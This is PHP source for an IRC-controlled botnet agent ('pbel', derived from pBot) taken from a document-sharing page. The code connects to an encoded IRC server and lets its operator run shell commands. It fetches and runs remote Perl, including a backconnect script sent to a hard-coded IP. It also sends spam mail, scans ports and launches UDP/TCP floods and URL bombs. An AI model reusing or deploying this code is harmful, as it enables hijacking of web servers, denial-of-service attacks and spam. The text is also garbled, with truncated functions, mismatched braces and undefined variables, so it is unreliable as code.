Академический Документы
Профессиональный Документы
Культура Документы
/****************************************************/
/* pbel - by s0 */
/* credits: the original author of pbot ( ? ) */
/****************************************************/
set_time_limit( 0 );
error_reporting( 0 );
echo "Success!";
class pBot
{
var $using_encode = true;
function is_safe( )
{
if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi(
"Windows", $this->ex( "net start" ) ) ) )
{
return 0;
}
return 1;
}
function get_chan( )
{
if( $this->using_encode )
{
return '#'.base64_decode( $this->config[ 'chan' ] );
}
else
{
return '#'.$this->config[ 'chan' ];
}
}
function start()
{
if( $this->using_encode )
{
if(!($this->conn = fsockopen(base64_decode($this-
>config['server']),$this->config['port'],$e,$s,30)))
{
$this->start();
}
}
else
{
if(!($this->conn = fsockopen($this->config['server'],$this-
>config['port'],$e,$s,30)))
{
$this->start();
}
}
$ident = $this->config['prefix'];
$alph = range("0","9");
for( $i=0; $i < $this->config['maxrand']; $i++ )
{
$ident .= $alph[rand(0,9)];
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this-
>config['modes']);
if( $this->using_encode )
{
$this->join($this->get_chan( ),
base64_decode($this->config['key']));
$this->privmsg($this->get_chan( ),"Hostbooter
v2 Online!");
$server_name = $_SERVER['SERVER_NAME'];
$req_uri =
$_SERVER['REQUEST_URI'];
$vuln = "http://".$server_name.$req_uri;
if (@ini_get("safe_mode") or
strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PART":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PRIVMSG":
if( ( substr($mcmd[0],0,1) ==
$this->config[ 'cprefix' ] ) )
{
if( $this->is_authed( $host )
== false )
{
switch( substr( $mcmd[
0 ], 1 ) )
{
case "login":
{
$this-
>auth_host( $nick, $mcmd[ 1 ], $host );
if( $this-
>is_authed( $host ) )
{
$this-
>privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] ".$nick." logged in!\3]");
$this-
>privmsg( $this->get_chan( ), exec('uptime'));
}
else
{
$this-
>privmsg( $this->get_chan( ), "[\3" . "4[\2Warning!\2] Incorrect Login from
".$nick."!\3]");
}
break;
}
}
}
else
{
switch(substr($mcmd[0],1))
{
case "exec":
{
if( !$this-
>is_safe( ) )
{
$safemode = "off";
}
$this-
>privmsg( $this->get_chan( ), "\3" . "4.php_uname( ) (SAFE: .$safemode.)\3]");
break;
}
case "safe":
{
$safemode =
"on";
if( !$this-
>is_safe( ) )
{
$safemode = "off";
}
$this-
>privmsg( $this->get_chan( ), "[\3" . "4Safe Mode is \2$safemode\2\3]");
break;
}
case "mail": //mail to from
subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4])
,$header,$times))
{
$this->privmsg( $this->get_chan( ),
"[\2MAIL\2]: Unable to send email.");
}
else
{
$this->privmsg( $this->get_chan( ),
"[\2MAIL\2]: Sent emails to $times people\2".$mcmd[1]."\2");
}
break;
}
case "uname":
{
$this-
>privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) );
break;
}
case "back":
{
$this-
>privmsg( $this->get_chan( ), exec('cd /tmp;lwp-download
http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/ext
reme/bc.txt;perl bc.txt 69.65.94.14 3071'));
$this-
>privmsg( $this->get_chan( ), "[\3" . "4Connecting to \2Snipa\2\3]");
}
case "dropperl":
{
if( $this-
>is_safe( ) )
{
$this-
>privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' );
break;
}
$perl_file =
$mcmd[1];
if( !empty(
$perl_file ) )
{
$this-
>ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm
-rf *'.$file_type.'*');
$this-
>ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm
-rf *'.$file_type.'*');
$this-
>ex('cd /tmp;rm -rf *'.$file_type.'**');
$this-
>ex('cd /dev/shm;rm -rf *'.$file_type.'**');
$this-
>privmsg( $this->get_chan( ), '[ execrfi ] Executed file
'.$new_remote.$new_local );
break;
}
$this-
>privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file );
break;
}
case "ip":
{
$this-
>privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] );
break;
}
case "execrfi":
{
$fileUrl =
$mcmd[1];
if( !empty(
$fileUrl ) )
{
$urli
= parse_url( $fileUrl );
if( !
empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) )
{
if( $fp )
{
$out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n";
$get_data = '';
while(!feof($fp))
break;
}
}
}
$this-
>privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl );
break;
}
case "base64":
{
$str_ed =
substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
switch(
$mcmd[1] )
{
case
"encode":
{
break;
}
case
"decode":
{
break;
}
}
break;
}
case "md5":
{
$str_md5 =
substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$this-
>privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ]
" );
break;
}
case "dns":
{
if(isset($mcmd[1]))
{
$ip =
explode(".",$mcmd[1]);
if(count($ip)==4 &&
is_numeric($ip[0]) && is_numeric($ip[1])
ini_restore( "open_basedir" );
}
$safemode =
"on";
if( !$this-
>is_safe( ) )
{
$safemode = "off";
$this-
>set_nick();
}
$this-
>privmsg( $this->get_chan( ), '[ safe ] '.$safemode );
}
case "moveserver":
{
if( count(
$mcmd ) > 3 )
{
$server = $mcmd[1];
$port
= $mcmd[2];
$channel = $mcmd[3];
$key =
$mcmd[4];
if(
$this->using_encode )
{
$this-
>config[ 'port' ] = $port;
$this-
>privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." =>
".$channel." => ".$key );
$this-
>send( "QUIT :moveserver command from ".$nick );
fclose( $this->conn );
$this-
>start();
}
break;
}
case "whois":
{
$param2 =
$mcmd[1];
if( !empty(
$param2 ) )
{
//do
it
//http://ws.arin.net/whois/?queryinput=127.0.0.1
$fp =
fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 );
if(
$fp )
{
$whodata = '';
while(!feof($fp))
/*do nothing*/
}else{
//ftp://user:password@host.com
$pftp =
parse_url( $mcmd[1] );
$file =
$mcmd[2];
$dest =
$mcmd[3];
if( empty(
$pftp[ 'host' ] )
||
empty( $pftp[ 'user' ] )
||
empty( $pftp[ 'pass' ] )
||
empty( $file )
||
empty( $dest ) )
{
$this-
>privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" );
}
else
{
if(
( !$conn_id ) || ( !$login_result ) )
{
if( !$upload )
else
}
}
}
break;
}
case "joinchan":
{
$channel =
$mcmd[1];
$key =
$mcmd[2];
$this-
>privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." => ".$key );
$this->join(
$channel, $key );
break;
}
case "partchan":
{
$this-
>privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] );
$this->send(
"PART ".$mcmd[1] );
}
case "wako":
break;
}
case "getvuln":
{
$server_name
= $_SERVER['SERVER_NAME'];
$req_uri =
$_SERVER['REQUEST_URI'];
if(
$server_name != "localhost" && $server_name != "127.0.0.1" )
{
if(
strlen( $server_name ) && strlen( $req_uri ) )
{
$vuln = "http://".$server_name.$req_uri;
else
}
fclose( $fp );
}
}
else
{
$this-
>privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" );
}
break;
}
case "pmsg":
{
$person =
$mcmd[1];
$text =
substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
$this-
>privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text );
$this-
>privmsg( $person, $text );
break;
}
case "pscan":
{
$host =
$mcmd[1];
$beginport =
$mcmd[2];
$endport =
$mcmd[3];
$open_ports
= "Open Port List for ".$host.": ";
for($i =
$beginport; $i < $endport; $i++)
{
if(
$this->scanport( $host, $i ) )
{
$open_ports .= "|".$i;
}
}
$this-
>privmsg( $this->get_chan( ), $open_ports );
break;
}
case "software":
{
$this-
>privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] );
break;
}
case "snf":
{
$this-
>config[ 'nickform' ] = $mcmd[ 1 ];
$this-
>privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." ]" );
break;
}
case "randnick":
{
$this-
>set_nick();
break;
}
case "logout":
{
$this-
>remove_auth( $host );
$this-
>privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] Goodbye, ".$nick.".\3]");
break;
}
case "urlbomb":
{
$this-
>urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] );
break;
}
case "udpflood":
{
if( count( $mcmd ) >
3 )
{
$this-
>udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
}
case "tcpflood":
{
if( count( $mcmd ) >
5 )
{
$this-
>tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
if( $mode != 0 )
{
while(!feof($fp)){/*do nothing*/}
}
fclose( $fp );
$success++;
}
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]:
Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]:
Config - $packets for $host:$port.");
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function set_nick()
{
$prefix = "[C]";
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ),
"apache" ) )
$prefix = "[UnixX]";
elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE'
] ), "iis" ) )
$prefix = "[I]";
elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE'
] ), "xitami" ) )
$prefix = "[X]";
else
$prefix = "[U]";
}
if( !$this->is_safe( ) )
{
$prefix .= "[S]";
}
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
if(count($fileext))
{
$URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
}
return ($URLpcs);
}
}
?>